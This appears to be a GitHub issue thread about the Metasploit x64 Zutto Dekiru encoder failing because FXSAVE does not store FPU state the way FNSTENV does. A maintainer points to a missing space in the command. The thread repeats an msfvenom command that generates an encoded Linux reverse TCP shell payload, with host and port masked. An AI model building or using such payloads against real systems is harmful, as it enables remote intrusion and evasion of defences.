
Is there an error with Zutto Dekiru encoder?

Open: shellchocolat opened this issue 2 years ago, 1 comment

Summary

I tried to use the Zutto Dekiru encoder (x64), but it seems not to work correctly because FXSAVE/FXSAVE64 doesn't save the FPU environment as well as FNSTENV does in the Shikata Ga Nai encoder (x86), so the POP instruction doesn't get a relative address to the shellcode's position, leading to an access denied when XORing with the key.

Relevant information

The command used to generate the payload is:

msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.binLHOST=xxx.xxx.xxx.xxx LPORT=xxxx

The permission of the section is RWX, so the error is not from here.

shellchocolat, Oct 14 '22 12:10

msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.binLHOST=xxx.xxx.xxx.xxx LPORT=xxxx <- Is this the command you ran? Looks like you're missing a space between the options and -o t.bin.

gwillcox-r7, Oct 17 '22 21:10

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot], Nov 17 '22 15:11

@shellchocolat Were you able to get this to work using the command msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.bin LHOST=xxx.xxx.xxx.xxx LPORT=xxxx?

gwillcox-r7, Nov 17 '22 19:11

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot], Dec 19 '22 15:12